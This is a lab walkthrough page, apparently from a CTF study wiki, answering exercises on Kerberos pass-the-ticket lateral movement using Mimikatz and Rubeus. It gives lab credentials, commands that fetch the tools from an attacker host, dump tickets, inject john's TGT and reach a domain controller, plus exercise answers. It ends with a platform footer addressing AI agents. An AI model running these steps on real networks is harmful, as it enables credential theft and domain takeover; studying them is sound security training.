> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-windows-ptt/questions.md).

# Questions

## PtT from Windows — Exercise Walkthrough Reference

### Lab Setup

**Target:** `10.129.204.23` **Creds:** `Administrator` / `AnotherC0mpl3xP4$$`

**Connect via RDP:**

```bash
xfreerdp3 /u:'Administrator' /p:'AnotherC0mpl3xP4$$' /v:10.129.204.23
```

**Serve tools from attacker machine (FTP):**

```bash
# Mimikatz
cd /usr/share/windows-resources/mimikatz/x64
sudo python3 -m pyftpdlib --port 21

# Rubeus
cd /usr/share/windows-resources/rubeus
sudo python3 -m pyftpdlib --port 21
```

**Download on target:**

```cmd
curl --output mimikatz.exe ftp://10.10.16.5/mimikatz.exe
curl --output rubeus.exe ftp://10.10.16.5/Rubeus.exe
```

***

### Method 1 — Mimikatz

#### Q1: Export all tickets. How many user TGTs?

```cmd
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit
dir
```

**Reading the output:**

| Filename pattern                                   | What it is                           |
| -------------------------------------------------- | ------------------------------------ |
| `john@krbtgt-INLANEFREIGHT.HTB.kirbi`              | ✅ User TGT — this is what you want   |
| `MS01$@krbtgt...`                                  | Machine account TGT — skip           |
| `@cifs-DC01...` / `@ldap-DC01...` / `@DNS-dc01...` | TGS tickets — service-specific, skip |

**Answer:** Count `@krbtgt` files for named users (john, david, julio) = **3 user TGTs**

***

#### Q2: Use john's TGT → access `\\DC01.inlanefreight.htb\john`

```cmd
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\Administrator\Desktop\[0;5b0ba]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
exit

dir \\DC01.inlanefreight.htb\john
type \\DC01.inlanefreight.htb\john\john.txt
```

> `kerberos::ptt` loads the ticket into the current logon session's Kerberos cache. After exiting Mimikatz, the session still holds John's TGT.

***

#### Q3: Use john's TGT → PowerShell Remoting to DC01 → read `C:\john\john.txt`

> Ticket is already injected from Q2. Local `whoami` still shows Administrator — that's your **local identity**. Kerberos uses the **injected ticket** for network auth.

```cmd
powershell
whoami          # still shows Administrator (local identity)

Enter-PSSession -ComputerName DC01
whoami          # now shows inlanefreight\john (network identity via injected ticket)

type C:\john\john.txt
```

***

### Method 2 — Rubeus

#### Q4: Export all tickets. How many user TGTs?

```cmd
Rubeus.exe dump /nowrap
```

Look for entries where `ServiceName = krbtgt/INLANEFREIGHT.HTB` with a named user (not `MS01$`).

**Answer:** john + david + julio = **3 user TGTs**

Copy the `Base64EncodedTicket` value for john — you need it for Q5.

***

#### Q5: Use john's TGT (Base64) → access `\\DC01.inlanefreight.htb\john`

```cmd
Rubeus.exe ptt /ticket:<base64_ticket_here>

dir \\DC01.inlanefreight.htb\john
type \\DC01.inlanefreight.htb\john\john.txt
```

> Rubeus injects the ticket entirely in memory — no `.kirbi` file needed.

***

#### Q6: Use john's TGT → PowerShell Remoting to DC01 → read `C:\john\john.txt`

> Same as Q3, ticket already injected via Rubeus.

```cmd
powershell
whoami          # Administrator (local)

Enter-PSSession -ComputerName DC01
whoami          # inlanefreight\john

type C:\john\john.txt
```

***

### Key Distinctions for This Lab

|                | Mimikatz                          | Rubeus                      |
| -------------- | --------------------------------- | --------------------------- |
| Export format  | `.kirbi` files on disk            | Base64 in terminal          |
| Inject command | `kerberos::ptt "path\file.kirbi"` | `ptt /ticket:<base64>`      |
| Admin needed   | Yes                               | Yes for dump, No for asktgt |

**Local identity vs network identity:**

> After injecting a ticket, `whoami` locally still shows your account. Only after `Enter-PSSession` (network hop) does the injected identity appear — because Kerberos kicks in at the network boundary.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-windows-ptt/questions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
